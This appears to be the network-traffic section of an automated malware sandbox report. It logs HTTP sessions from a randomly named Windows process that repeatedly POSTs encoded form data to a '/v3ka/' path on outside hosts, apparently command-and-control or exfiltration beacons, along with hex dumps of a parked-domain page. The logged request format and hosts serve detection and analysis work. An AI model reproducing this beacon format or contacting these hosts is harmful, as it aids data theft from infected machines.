3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6d 76 6d 75 73 69 63 66 61 63 74 6f 72 79 2e 6f 72 67 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 6d 76 6d 75 73 69 63 66 61 63 74 6f 72 79 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 76 6d 75 73 69 63 66 61 63 74 6f 72 79 2e 6f 72 67 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66
                                                                                    Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_ElQkokIyThrk3pYerPB6MjAnPczDOy8Z3TT02PZqKru+pgu5kt8h9x6gRDWTFkcsx9hYFG+7N+fGmHea5Z4vcw==><head><meta charset="utf-8"><title>mvmusicfactory.org&nbsp;-&nbsp;mvmusicfactory Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="mvmusicfactory.org is your first and best source for all of the information youre looking f
                                                                                    Mar 18, 2024 15:10:24.653379917 CET1286INData Raw: 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 6d 76 6d 75 73 69 63 66 61 63 74
                                                                                    Data Ascii: or. From general topics to more of what you would expect to find here, mvmusicfactory.org has it all. We h1062ope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/t
                                                                                    Mar 18, 2024 15:10:24.653424025 CET1286INData Raw: 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e
                                                                                    Data Ascii: ){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webki
                                                                                    Mar 18, 2024 15:10:24.653585911 CET1286INData Raw: 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f
                                                                                    Data Ascii: nouncement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-
                                                                                    Mar 18, 2024 15:10:24.653703928 CET1286INData Raw: 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39
                                                                                    Data Ascii: imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-
                                                                                    Mar 18, 2024 15:10:24.653759956 CET1286INData Raw: 6c 20 2e 33 73 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77
                                                                                    Data Ascii: l .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline
                                                                                    Mar 18, 2024 15:10:24.653805971 CET690INData Raw: 6c 6f 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61
                                                                                    Data Ascii: lor:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-s
                                                                                    Mar 18, 2024 15:10:24.654005051 CET1286INData Raw: 31 32 34 30 0d 0a 72 64 65 72 2d 72 61 64 69 75 73 3a 33 34 70 78 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 2d 2d 72 6f 75 6e 64 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 7d 69 6e 70 75 74 3a 63 68 65 63 6b
                                                                                    Data Ascii: 1240rder-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:transla
                                                                                    Mar 18, 2024 15:10:24.654031992 CET1286INData Raw: 65 78 3a 2d 31 3b 74 6f 70 3a 35 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65
                                                                                    Data Ascii: ex:-1;top:50px;position:inherit}.container-content__right{background:url("//img.sedoparking.com/templates/bg/arrows-curved.png") #0e162e no-repeat center left;background-size:94% 640px;flex-grow:2;-moz-transform:scaleX(-1);-o-transform:scaleX(
                                                                                    Mar 18, 2024 15:10:24.654230118 CET1286INData Raw: 30 31 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 74 65 78 74 7b 70 61 64 64 69 6e 67 3a 33 70 78 20 30 20 36 70 78 20 30 3b 6d 61 72 67 69 6e 3a 2e 31 31 65 6d 20 30 3b 6c 69 6e 65 2d 68
                                                                                    Data Ascii: 01}.two-tier-ads-list__list-element-text{padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#fff}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-link:link,.two
                                                                                    Mar 18, 2024 15:10:24.835449934 CET1286INData Raw: 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 31 34 34 30 70 78 7d 2e 6e 63 2d 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 6e 63 2d
                                                                                    Data Ascii: o;max-width:1440px}.nc-container{width:100%;text-align:center;margin-top:10px}.nc-container span{font-family:Ariel,sans-serif;font-size:16px;color:#888} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"single


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    29192.168.11.3049840103.146.179.172806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:10:34.275185108 CET727OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.kmyangjia.com
                                                                                    Origin: http://www.kmyangjia.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.kmyangjia.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 65 53 72 42 65 46 63 63 6f 5a 77 77 44 70 66 36 59 39 31 6a 77 4d 56 36 32 73 4c 4d 36 57 6d 77 49 61 2f 50 47 39 66 48 53 7a 58 61 5a 67 58 4b 39 6a 58 63 35 46 37 36 76 4e 67 54 63 50 36 4a 50 69 37 68 72 4b 48 52 50 32 4d 31 46 61 70 61 79 35 7a 72 75 35 50 57 59 77 30 5a 37 62 4a 48 71 4c 37 54 36 58 39 75 4f 56 45 66 64 35 42 70 33 32 56 79 48 76 48 6a 6d 43 4e 4e 57 77 49 77 6c 45 64 67 31 42 48 39 4f 33 35 6e 31 64 32 70 46 41 68 49 5a 61 74 64 47 57 42 52 6c 59 31 4d 34 77 38 44 56 35 72 52 57 6c 4b 57 50 66 6f 58 46 57 78 76 48 54 45 59 76 4b 61 71 68 39 39 2f 64 41 3d 3d
                                                                                    Data Ascii: c4qx7JIP=eSrBeFccoZwwDpf6Y91jwMV62sLM6WmwIa/PG9fHSzXaZgXK9jXc5F76vNgTcP6JPi7hrKHRP2M1Fapay5zru5PWYw0Z7bJHqL7T6X9uOVEfd5Bp32VyHvHjmCNNWwIwlEdg1BH9O35n1d2pFAhIZatdGWBRlY1M4w8DV5rRWlKWPfoXFWxvHTEYvKaqh99/dA==
                                                                                    Mar 18, 2024 15:10:34.607134104 CET289INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 14:10:34 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 146
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    30192.168.11.3049841103.146.179.172806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:10:37.130934954 CET747OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.kmyangjia.com
                                                                                    Origin: http://www.kmyangjia.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 225
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.kmyangjia.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 65 53 72 42 65 46 63 63 6f 5a 77 77 44 4a 76 36 65 61 68 6a 32 73 56 39 6f 38 4c 4d 30 32 6d 38 49 61 7a 50 47 38 72 74 52 42 44 61 5a 46 7a 4b 36 6e 37 63 38 46 37 36 6f 39 67 57 52 76 36 43 50 69 33 70 72 4b 4c 52 50 32 49 31 46 62 31 61 79 4f 66 6f 30 4a 50 55 45 77 30 62 6c 72 4a 48 71 4c 37 54 36 55 42 49 4f 55 73 66 64 70 78 70 6c 45 39 78 45 76 48 69 77 79 4e 4e 42 67 4a 59 6c 45 63 31 31 46 4f 67 4f 30 4e 6e 31 63 47 70 46 52 68 4a 54 61 74 62 62 47 41 66 73 39 59 44 30 41 4d 67 65 4b 72 2b 50 46 4b 56 44 6f 5a 4e 59 56 46 74 55 7a 34 31 7a 4c 33 43 6a 2f 38 6b 41 49 69 77 52 37 50 6e 6c 73 4f 58 57 45 74 63 33 62 77 4b 49 63 51 3d
                                                                                    Data Ascii: c4qx7JIP=eSrBeFccoZwwDJv6eahj2sV9o8LM02m8IazPG8rtRBDaZFzK6n7c8F76o9gWRv6CPi3prKLRP2I1Fb1ayOfo0JPUEw0blrJHqL7T6UBIOUsfdpxplE9xEvHiwyNNBgJYlEc11FOgO0Nn1cGpFRhJTatbbGAfs9YD0AMgeKr+PFKVDoZNYVFtUz41zL3Cj/8kAIiwR7PnlsOXWEtc3bwKIcQ=
                                                                                    Mar 18, 2024 15:10:37.462805033 CET289INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 14:10:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 146
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    31192.168.11.3049842103.146.179.172806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:10:39.990432024 CET1664OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.kmyangjia.com
                                                                                    Origin: http://www.kmyangjia.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 1141
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.kmyangjia.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 65 53 72 42 65 46 63 63 6f 5a 77 77 44 4a 76 36 65 61 68 6a 32 73 56 39 6f 38 4c 4d 30 32 6d 38 49 61 7a 50 47 38 72 74 52 41 37 61 5a 54 2f 4b 38 47 37 63 2f 46 37 36 72 39 67 58 52 76 36 66 50 69 76 74 72 4b 58 6e 50 30 67 31 48 35 39 61 77 38 6e 6f 36 35 50 55 63 77 30 61 37 62 49 50 71 4c 72 58 36 55 52 49 4f 55 73 66 64 72 35 70 6d 57 56 78 43 76 48 6a 6d 43 4e 33 57 77 4a 6a 6c 45 56 43 31 46 44 58 4f 43 39 6e 32 38 57 70 48 6a 5a 4a 51 36 74 6a 59 47 42 43 73 39 64 44 30 41 51 73 65 4b 7a 51 50 46 79 56 53 2b 59 72 64 6d 64 61 46 68 59 5a 33 70 44 76 6a 64 70 76 4a 76 75 50 56 59 44 33 73 50 6d 48 51 68 55 46 76 5a 67 79 57 38 6d 35 79 50 75 53 6c 6e 6e 4e 4c 75 32 31 61 50 71 56 2b 59 79 4e 79 75 6e 34 74 39 50 6d 4d 7a 61 75 4a 44 42 47 57 65 2f 34 30 71 69 68 4f 35 47 35 4e 56 42 65 31 64 74 47 54 78 72 71 32 36 77 37 37 2f 68 66 49 6e 43 33 6d 6e 53 63 53 31 53 44 69 31 6d 2f 6d 6d 38 37 61 42 47 73 58 6a 2f 78 74 4c 58 43 6b 32 4f 5a 64 35 4a 4f 6e 47 67 44 5a 39 55 6f 38 6d 47 34 74 63 50 74 44 75 59 53 74 59 73 4f 57 75 53 69 48 50 30 4d 32 72 50 35 38 78 64 7a 36 68 39 49 6b 68 38 4e 77 69 57 68 39 4d 79 78 55 37 6a 6d 35 57 4c 73 5a 6b 79 67 78 31 7a 38 79 6a 4d 6a 66 70 44 72 59 57 6c 51 63 59 34 4b 49 39 4a 47 54 53 66 35 36 50 53 79 73 6c 76 45 32 42 46 43 4a 38 70 35 65 35 43 63 52 57 53 57 4d 33 44 58 6e 78 64 44 43 36 4b 55 4b 61 69 44 43 4d 6c 64 76 31 77 61 4d 4b 34 41 35 59 2f 4d 61 36 37 4f 6a 38 4f 71 68 6f 77 58 61 66 46 6e 63 59 39 4a 4e 38 58 34 73 37 5a 47 74 59 64 2b 39 30 4c 78 77 64 36 67 4f 45 67 39 62 33 6f 37 4d 7a 73 64 42 69 4c 77 37 72 70 49 64 78 4e 7a 53 45 70 4c 30 47 4d 77 41 76 6b 65 55 6d 6a 5a 7a 55 42 31 39 64 31 71 64 79 69 76 4e 51 69 65 41 39 7a 72 47 4a 31 73 6f 59 51 32 63 70 72 56 62 71 44 51 72 66 65 57 59 35 47 6a 37 4e 72 45 4e 61 61 6f 2b 4f 69 43 7a 71 57 72 71 4f 64 34 66 4f 43 66 58 58 47 43 75 47 52 53 4a 69 45 4c 37 44 4f 2f 66 43 6c 56 37 55 6a 6a 30 33 75 6e 4a 38 34 77 33 78 51 72 33 72 63 59 41 6f 4e 53 30 6d 49 41 67 46 70 41 34 6c 59 50 74 51 55 71 79 62 78 62 2b 7a 61 2f 2b 66 61 45 77 69 38 4e 2f 7a 77 59 6a 62 66 70 2f 77 4d 62 5a 42 4b 6b 39 53 39 65 68 4f 4a 49 75 4c 30 50 35 53 62 4a 35 4e 31 4d 6a 6c 67 43 69 74 45 75 6a 75 72 2f 51 76 36 4c 38 31 6a 46 46 6f 66 31 77 6e 72 36 77 43 45 57 34 68 54 38 6b 33 6e 6b 73 38 34 7a 43 38 76 56 2b 65 71 4b 43 4e 38 4d 44 6c 63 6e 48 4e 53 70 50 70 61 4a 51 72 59 74 30 65 30 74 39 41 78 53 30 56 50 4e 61 64 78 71 2f 6d 33 56 6f 74 38 79 44 78 64 43 2b 42 43 65 4d 46 6d 43 31 56 41 4c 6e 35 53 54 46 61 2b 65 49 2f 36 39 65 51 61 38 53 6f 67 37 4b 43 4f 79 31 30 54 65 79 31 55 75 75 39 32 75 4e 43 53 7a 2b 59 2b 63 59 58 6b 62 6d 65 46 32 41 39 72 66 38 73 35 7a 53 66 6d 38 69 79 34 30 62 38 74 42 4d 2f 71 46 75 73 4f 6a 76 6d 58 75 35 53 77 6f 63 78 2f 7a 66 62 56 51 7a 51 6c 70 74 51 7a 43 55 55 45 4d 34 36 48 6e 67 35 4f 43 6a 52 62 44 57 44 4a 74 4a 66 36 52 41 67 4f 4c 4c 7a 49 42 34 61 38 75 47 57 78 70 34 58 66 47 6b 43 33 56 77 36 4b 57 69 63 73 55 50 2f 67 4d 31 76 50 56 68 70 62 67 7a 41 51 52 2b 59 44 43 50 4b 6e 69 43 7a 4c 43 48 36 55 6e 41 73 35 61 6d 71 51 50 6a 2f 57 31 75 4d 48 66 69 56 7a 4e 54 4e 64 54 63 39 36 53 6b 75 76 51 34 49 35 4d 62 75 42 6d 31 6f 75 2f 5a 4d 4c 75 64 77 7a 67 5a 51 38 38 4a 56 4c 53 65 34 69 41 6d 69 76 62 71 6e 6f 6e 35 63 75 6f 70 2b 30 62 73 31 4d 70 6c 71 50 59 76 73 73 6a
                                                                                    Data Ascii: c4qx7JIP=eSrBeFccoZwwDJv6eahj2sV9o8LM02m8IazPG8rtRA7aZT/K8G7c/F76r9gXRv6fPivtrKXnP0g1H59aw8no65PUcw0a7bIPqLrX6URIOUsfdr5pmWVxCvHjmCN3WwJjlEVC1FDXOC9n28WpHjZJQ6tjYGBCs9dD0AQseKzQPFyVS+YrdmdaFhYZ3pDvjdpvJvuPVYD3sPmHQhUFvZgyW8m5yPuSlnnNLu21aPqV+YyNyun4t9PmMzauJDBGWe/40qihO5G5NVBe1dtGTxrq26w77/hfInC3mnScS1SDi1m/mm87aBGsXj/xtLXCk2OZd5JOnGgDZ9Uo8mG4tcPtDuYStYsOWuSiHP0M2rP58xdz6h9Ikh8NwiWh9MyxU7jm5WLsZkygx1z8yjMjfpDrYWlQcY4KI9JGTSf56PSyslvE2BFCJ8p5e5CcRWSWM3DXnxdDC6KUKaiDCMldv1waMK4A5Y/Ma67Oj8OqhowXafFncY9JN8X4s7ZGtYd+90Lxwd6gOEg9b3o7MzsdBiLw7rpIdxNzSEpL0GMwAvkeUmjZzUB19d1qdyivNQieA9zrGJ1soYQ2cprVbqDQrfeWY5Gj7NrENaao+OiCzqWrqOd4fOCfXXGCuGRSJiEL7DO/fClV7Ujj03unJ84w3xQr3rcYAoNS0mIAgFpA4lYPtQUqybxb+za/+faEwi8N/zwYjbfp/wMbZBKk9S9ehOJIuL0P5SbJ5N1MjlgCitEujur/Qv6L81jFFof1wnr6wCEW4hT8k3nks84zC8vV+eqKCN8MDlcnHNSpPpaJQrYt0e0t9AxS0VPNadxq/m3Vot8yDxdC+BCeMFmC1VALn5STFa+eI/69eQa8Sog7KCOy10Tey1Uuu92uNCSz+Y+cYXkbmeF2A9rf8s5zSfm8iy40b8tBM/qFusOjvmXu5Swocx/zfbVQzQlptQzCUUEM46Hng5OCjRbDWDJtJf6RAgOLLzIB4a8uGWxp4XfGkC3Vw6KWicsUP/gM1vPVhpbgzAQR+YDCPKniCzLCH6UnAs5amqQPj/W1uMHfiVzNTNdTc96SkuvQ4I5MbuBm1ou/ZMLudwzgZQ88JVLSe4iAmivbqnon5cuop+0bs1MplqPYvssj
                                                                                    Mar 18, 2024 15:10:40.322490931 CET289INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 14:10:40 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 146
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    32192.168.11.3049843103.146.179.172806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:10:42.848279953 CET459OUTGET /v3ka/?c4qx7JIP=TQDhdygg/6k1FrT3duJj1OYD3+fr21m2MLjtTeKUejKDGRun2D/B3i3kqoFCSoO3Pw/E65XWfWwoO6YHx8j54r/FSG1v4bIQ+pjQtA18fUYdL5hShFxGKN0=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.kmyangjia.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:10:43.179832935 CET289INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 14:10:43 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 146
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    33192.168.11.3049844109.234.166.81806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:10:48.749150991 CET754OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.globalworld-travel.com
                                                                                    Origin: http://www.globalworld-travel.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.globalworld-travel.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
